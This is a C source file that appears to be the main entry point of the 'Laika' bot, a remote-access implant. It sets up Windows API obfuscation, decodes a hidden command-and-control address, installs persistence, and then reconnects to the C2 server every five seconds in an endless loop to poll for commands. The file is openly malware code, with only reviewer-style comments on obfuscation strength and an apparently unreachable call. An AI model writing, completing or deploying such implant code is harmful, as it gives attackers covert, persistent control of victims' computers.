#include "bot.h"
#include "lbox.h"
#include "lconfig.h"
#include "lerror.h"
#include "ltask.h"
#include "obf.h"
#include "persist.h"
#include "shell.h"
#include <stdio.h>
/*
 * Bot entry point.
 *
 * Compiled as WinMain on Windows when DEBUG is not defined, and as a plain main() in every other
 * configuration (Windows DEBUG builds and all non-Windows builds). The body is shared.
 *
 * Without LAIKA_PERSISTENCE the bot makes a single connection, polls until the socket is no
 * longer alive (or an error is thrown inside the LAIKA_TRY region), frees the bot and returns 0.
 * With LAIKA_PERSISTENCE the same sequence is repeated in an endless loop with a fixed 5 second
 * pause between attempts, always against the same cncIP / cncPORT values.
 */
#if defined(_WIN32) && !defined(DEBUG)
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, INT nCmdShow)
#else
int main()
#endif
{
    struct sLaika_bot *bot;

    /* these two boxes only obfuscate the CNC ip & port. they are unlocked right here, at the very
       start of execution, and stay in memory for the whole run, so they are really easy to dump.
       both values are also things anyone would see from opening wireshark */
    LAIKA_BOX_SKID_START(char *, cncIP, LAIKA_CNC_IP);
    LAIKA_BOX_SKID_START(char *, cncPORT, LAIKA_CNC_PORT);

    /* set up API obfuscation (windows only) */
    laikaO_init();

#ifdef LAIKA_PERSISTENCE
    laikaB_markRunning();

    /* try to install persistence */
    laikaB_tryPersist();

    /* persistent builds never leave this loop: each pass is one full connect/poll/free cycle */
    for (;;) {
#endif
        bot = laikaB_newBot();

        LAIKA_TRY
            /* connect to test CNC */
            laikaB_connectToCNC(bot, cncIP, cncPORT);

            /* poll the bot for as long as the connection is alive. the extra parentheses around
               the argument are kept exactly as written; presumably laikaS_isAlive is a macro that
               does not parenthesize its parameter - confirm before simplifying */
            while (laikaS_isAlive((&bot->peer->sock))) {
                laikaB_poll(bot);
            }
        LAIKA_TRYEND

        /* we get here once the bot was killed or it threw an error */
        laikaB_freeBot(bot);
#ifdef LAIKA_PERSISTENCE
        /* fixed 5 second wait before the next connection attempt */
# ifndef _WIN32
        sleep(5);
# else
        Sleep(5000);
# endif
    }

    /* NOTE(review): no break out of the loop above is visible here, so this call looks
       unreachable as written - confirm against the LAIKA_TRY / LAIKA_TRYEND definitions */
    laikaB_unmarkRunning();
#endif

    /* vm boxes are left opened */
    return 0;
}